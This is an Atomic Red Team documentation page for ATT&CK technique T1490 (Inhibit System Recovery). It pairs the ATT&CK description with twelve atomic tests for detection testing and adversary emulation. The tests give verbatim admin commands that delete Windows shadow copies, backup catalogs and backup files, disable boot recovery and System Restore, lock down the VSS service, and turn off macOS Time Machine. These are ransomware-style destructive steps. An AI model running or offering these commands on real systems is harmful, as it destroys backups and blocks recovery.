security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
python_conversion
atomic-red-team/atomics/T1490/T1490.md
T
Atomic Red Team doc generator 762f0548a1 Generated docs from job=generate-docs branch=master [ci skip]
2025-05-01 15:13:41 +00:00

460 lines
15 KiB
Markdown
Raw Permalink Blame History

This file contains ambiguous Unicode characters
This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.
# T1490 - Inhibit System Recovery
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1490)
<blockquote>
Adversaries may delete or remove built-in data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) This may deny access to available backups and recovery options.
Operating systems may contain features that can help fix corrupted systems, such as a backup catalog, volume shadow copies, and automatic repair features. Adversaries may disable or delete system recovery features to augment the effects of [Data Destruction](https://attack.mitre.org/techniques/T1485) and [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486).(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) Furthermore, adversaries may disable recovery notifications, then corrupt backups.(Citation: disable_notif_synology_ransom)
A number of native Windows utilities have been used by adversaries to disable or delete system recovery features:
* <code>vssadmin.exe</code> can be used to delete all volume shadow copies on a system - <code>vssadmin.exe delete shadows /all /quiet</code>
* [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) can be used to delete volume shadow copies - <code>wmic shadowcopy delete</code>
* <code>wbadmin.exe</code> can be used to delete the Windows Backup Catalog - <code>wbadmin.exe delete catalog -quiet</code>
* <code>bcdedit.exe</code> can be used to disable automatic Windows recovery features by modifying boot configuration data - <code>bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no</code>
* <code>REAgentC.exe</code> can be used to disable Windows Recovery Environment (WinRE) repair/recovery options of an infected system
* <code>diskshadow.exe</code> can be used to delete all volume shadow copies on a system - <code>diskshadow delete shadows all</code> (Citation: Diskshadow) (Citation: Crytox Ransomware)
On network devices, adversaries may leverage [Disk Wipe](https://attack.mitre.org/techniques/T1561) to delete backup firmware images and reformat the file system, then [System Shutdown/Reboot](https://attack.mitre.org/techniques/T1529) to reload the device. Together this activity may leave network devices completely inoperable and inhibit recovery operations.
On ESXi servers, adversaries may delete or encrypt snapshots of virtual machines to support [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486), preventing them from being leveraged as backups (e.g., via ` vim-cmd vmsvc/snapshot.removeall`).(Citation: Cybereason)
Adversaries may also delete “online” backups that are connected to their network whether via network storage media or through folders that sync to cloud services.(Citation: ZDNet Ransomware Backups 2020) In cloud environments, adversaries may disable versioning and backup policies and delete snapshots, database backups, machine images, and prior versions of objects designed to be used in disaster recovery scenarios.(Citation: Dark Reading Code Spaces Cyber Attack)(Citation: Rhino Security Labs AWS S3 Ransomware)
</blockquote>
## Atomic Tests
- [Atomic Test #1 - Windows - Delete Volume Shadow Copies](#atomic-test-1---windows---delete-volume-shadow-copies)
- [Atomic Test #2 - Windows - Delete Volume Shadow Copies via WMI](#atomic-test-2---windows---delete-volume-shadow-copies-via-wmi)
- [Atomic Test #3 - Windows - wbadmin Delete Windows Backup Catalog](#atomic-test-3---windows---wbadmin-delete-windows-backup-catalog)
- [Atomic Test #4 - Windows - Disable Windows Recovery Console Repair](#atomic-test-4---windows---disable-windows-recovery-console-repair)
- [Atomic Test #5 - Windows - Delete Volume Shadow Copies via WMI with PowerShell](#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell)
- [Atomic Test #6 - Windows - Delete Backup Files](#atomic-test-6---windows---delete-backup-files)
- [Atomic Test #7 - Windows - wbadmin Delete systemstatebackup](#atomic-test-7---windows---wbadmin-delete-systemstatebackup)
- [Atomic Test #8 - Windows - Disable the SR scheduled task](#atomic-test-8---windows---disable-the-sr-scheduled-task)
- [Atomic Test #9 - Disable System Restore Through Registry](#atomic-test-9---disable-system-restore-through-registry)
- [Atomic Test #10 - Windows - vssadmin Resize Shadowstorage Volume](#atomic-test-10---windows---vssadmin-resize-shadowstorage-volume)
- [Atomic Test #11 - Modify VSS Service Permissions](#atomic-test-11---modify-vss-service-permissions)
- [Atomic Test #12 - Disable Time Machine](#atomic-test-12---disable-time-machine)
<br/>
## Atomic Test #1 - Windows - Delete Volume Shadow Copies
Deletes Windows Volume Shadow Copies. This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer. Upon
execution, if no shadow volumes exist the message "No items found that satisfy the query." will be displayed. If shadow volumes are present, it
will delete them without printing output to the screen. This is because the /quiet parameter was passed which also suppresses the y/n
confirmation prompt. Shadow copies can only be created on Windows server or Windows 8.
https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/cc788055(v=ws.11)
**Supported Platforms:** Windows
**auto_generated_guid:** 43819286-91a9-4369-90ed-d31fb4da2c01
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
vssadmin.exe delete shadows /all /quiet
```
#### Dependencies: Run with `powershell`!
##### Description: Create volume shadow copy of C:\ . This prereq command only works on Windows Server or Windows 8.
##### Check Prereq Commands:
```powershell
if(!(vssadmin.exe list shadows | findstr "No items found that satisfy the query.")) { exit 0 } else { exit 1 }
```
##### Get Prereq Commands:
```powershell
vssadmin.exe create shadow /for=c:
```
<br/>
<br/>
## Atomic Test #2 - Windows - Delete Volume Shadow Copies via WMI
Deletes Windows Volume Shadow Copies via WMI. This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer.
**Supported Platforms:** Windows
**auto_generated_guid:** 6a3ff8dd-f49c-4272-a658-11c2fe58bd88
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
wmic.exe shadowcopy delete
```
#### Dependencies: Run with `powershell`!
##### Description: Create volume shadow copy of C:\ .
##### Check Prereq Commands:
```powershell
if(!(vssadmin.exe list shadows | findstr "No items found that satisfy the query.")) { exit 0 } else { exit 1 }
```
##### Get Prereq Commands:
```powershell
wmic shadowcopy call create Volume='C:\'
```
<br/>
<br/>
## Atomic Test #3 - Windows - wbadmin Delete Windows Backup Catalog
Deletes Windows Backup Catalog. This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer. Upon execution,
"The backup catalog has been successfully deleted." will be displayed in the PowerShell session.
**Supported Platforms:** Windows
**auto_generated_guid:** 263ba6cb-ea2b-41c9-9d4e-b652dadd002c
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
wbadmin delete catalog -quiet
```
<br/>
<br/>
## Atomic Test #4 - Windows - Disable Windows Recovery Console Repair
Disables repair by the Windows Recovery Console on boot. This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer.
Upon execution, "The operation completed successfully." will be displayed in the powershell session.
**Supported Platforms:** Windows
**auto_generated_guid:** cf21060a-80b3-4238-a595-22525de4ab81
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
bcdedit.exe /set {default} recoveryenabled no
```
#### Cleanup Commands:
```cmd
bcdedit.exe /set {default} bootstatuspolicy DisplayAllFailures >nul 2>&1
bcdedit.exe /set {default} recoveryenabled yes >nul 2>&1
```
<br/>
<br/>
## Atomic Test #5 - Windows - Delete Volume Shadow Copies via WMI with PowerShell
Deletes Windows Volume Shadow Copies with PowerShell code and Get-WMIObject.
This technique is used by numerous ransomware families such as Sodinokibi/REvil.
Executes Get-WMIObject. Shadow copies can only be created on Windows server or Windows 8, so upon execution
there may be no output displayed.
**Supported Platforms:** Windows
**auto_generated_guid:** 39a295ca-7059-4a88-86f6-09556c1211e7
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}
```
<br/>
<br/>
## Atomic Test #6 - Windows - Delete Backup Files
Deletes backup files in a manner similar to Ryuk ransomware. Upon exection, many "access is denied" messages will appear as the commands try
to delete files from around the system.
**Supported Platforms:** Windows
**auto_generated_guid:** 6b1dbaf6-cc8a-4ea6-891f-6058569653bf
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.* c:\backup*.* c:\*.set c:\*.win c:\*.dsk
```
<br/>
<br/>
## Atomic Test #7 - Windows - wbadmin Delete systemstatebackup
Deletes the Windows systemstatebackup using wbadmin.exe. This technique is used by numerous ransomware families. This may only be successful on server platforms that have Windows Backup enabled.
**Supported Platforms:** Windows
**auto_generated_guid:** 584331dd-75bc-4c02-9e0b-17f5fd81c748
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
wbadmin delete systemstatebackup -keepVersions:0
```
<br/>
<br/>
## Atomic Test #8 - Windows - Disable the SR scheduled task
Use schtasks.exe to disable the System Restore (SR) scheduled task
**Supported Platforms:** Windows
**auto_generated_guid:** 1c68c68d-83a4-4981-974e-8993055fa034
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
```
#### Cleanup Commands:
```cmd
schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /enable >nul 2>&1
```
<br/>
<br/>
## Atomic Test #9 - Disable System Restore Through Registry
Modify the registry of the currently logged in user using reg.exe via cmd console to disable system restore on the computer.
See how remcos RAT abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details
**Supported Platforms:** Windows
**auto_generated_guid:** 66e647d1-8741-4e43-b7c1-334760c2047f
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t "REG_DWORD" /d "1" /f
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t "REG_DWORD" /d "1" /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "DisableConfig" /t "REG_DWORD" /d "1" /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "DisableSR" /t "REG_DWORD" /d "1" /f
```
#### Cleanup Commands:
```cmd
reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /f >nul 2>&1
reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /f >nul 2>&1
reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "DisableConfig" /f >nul 2>&1
reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "DisableSR" /f >nul 2>&1
```
<br/>
<br/>
## Atomic Test #10 - Windows - vssadmin Resize Shadowstorage Volume
Adversaries generally try to Resize Shadowstorage Volume using vssadmin.exe to avoid the shadow volumes being made again. This technique is typically found used by adversaries during a ransomware event and a precursor to deleting the shadowstorage.
**Supported Platforms:** Windows
**auto_generated_guid:** da558b07-69ae-41b9-b9d4-4d98154a7049
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
vssadmin resize shadowstorage /For=C: /On=C: /MaxSize=20%
```
<br/>
<br/>
## Atomic Test #11 - Modify VSS Service Permissions
This atomic test alters the security settings of the Volume Shadow Copy Service (VSS) by modifying its permissions, potentially impacting system recovery operations. The specific permissions set by the command are as follows:
- Deny Generic All (GA) permissions to Network Users (NU)
- Deny GA permissions to Everyone (WD)
- Deny GA permissions to Anonymous (AN)
- Allow Full Access (FA) and Generic All (GA) permissions to Everyone (WD) in System ACL (SACL)
- Allow Object Inherit and Inherit Only (OIIO) Full Access (FA) and GA permissions to Everyone (WD) in SACL
These permissions can significantly restrict VSS functionalities, including backup and restore operations. As such, it is essential to run this test only in a controlled environment with administrative privileges.
A cleanup command is provided to reset VSS permissions to a common default configuration, which should be verified against your specific system's configuration. It's crucial to use this cleanup command after testing to ensure the system's backup and recovery capabilities remain functional. Running this test on a production system or critical environment is not recommended without proper precautions and a robust recovery plan.
**Supported Platforms:** Windows
**auto_generated_guid:** a4420f93-5386-4290-b780-f4f66abc7070
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
sc sdset VSS D:(D;;GA;;;NU)(D;;GA;;;WD)(D;;GA;;;AN)S:(AU;FA;GA;;;WD)(AU;OIIOFA;GA;;;WD)
```
#### Cleanup Commands:
```cmd
sc sdset VSS D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;LC;;;BU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
```
<br/>
<br/>
## Atomic Test #12 - Disable Time Machine
Disables Time Machine which is Apple's automated backup utility software. Attackers can use this to prevent backups from occurring and hinder the victim's ability to recover from any damage.
**Supported Platforms:** macOS
**auto_generated_guid:** ed952f70-91d4-445a-b7ff-30966bfb1aff
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
sudo tmutil disable
```
#### Cleanup Commands:
```sh
sudo tmutil enable
```
<br/>
Reference in New Issue View Git Blame Copy Permalink